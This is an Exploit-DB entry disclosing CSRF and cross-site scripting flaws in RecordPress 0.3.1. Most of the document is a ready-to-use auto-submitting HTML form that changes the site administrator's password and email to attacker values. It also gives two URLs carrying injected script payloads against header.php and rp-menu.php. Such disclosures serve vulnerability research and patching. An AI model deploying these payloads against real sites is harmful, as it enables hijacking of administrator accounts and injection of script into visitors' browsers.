EXPLOITS

recordpress 0.3.1 - Multiple Vulnerabilities

Author: Khashayar Fereidani
type: webapps
platform: php
port: 
date_added: 2011-03-09  
date_updated: 2011-04-09  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comrp_v0_3_1_hd.zip  

raw file: 16950.txt  

----------------------------------------------------------------
WebApplication : RecordPress 0.3.1
Type of vunlnerability : CSRF ( Change Admin Password ) And XSS
Risk of use : Medium
----------------------------------------------------------------
Producer Website : http://www.recordpress.org/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

CSRF For Change Admin Password :

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://examplesite/admin/rp-settings-users-edit-db.php?id=1";

method="POST" name="form">

<input type="hidden" name="formusername" value="admin">

<input type="hidden" name="formname" value="admin">

<input type="hidden" name="formemail" value="email@pwnedpwnedpwned.sss">

<input type="hidden" name="formpass" value="password">

<input type="hidden" name="formpass2" value="password">

<input type="hidden" name="formadminstatus" value="2">

<input type="hidden" name="rp-settings-users-edit-db" value="Confirm+%BB">


</form>
</body>
</html>

------------------------------------------------

Cross Site Scripting Vulnerabilities :

http://examplesite/header.php?row[titledesc]=<script>alert(123)</script>
http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=<script>alert(123)</script>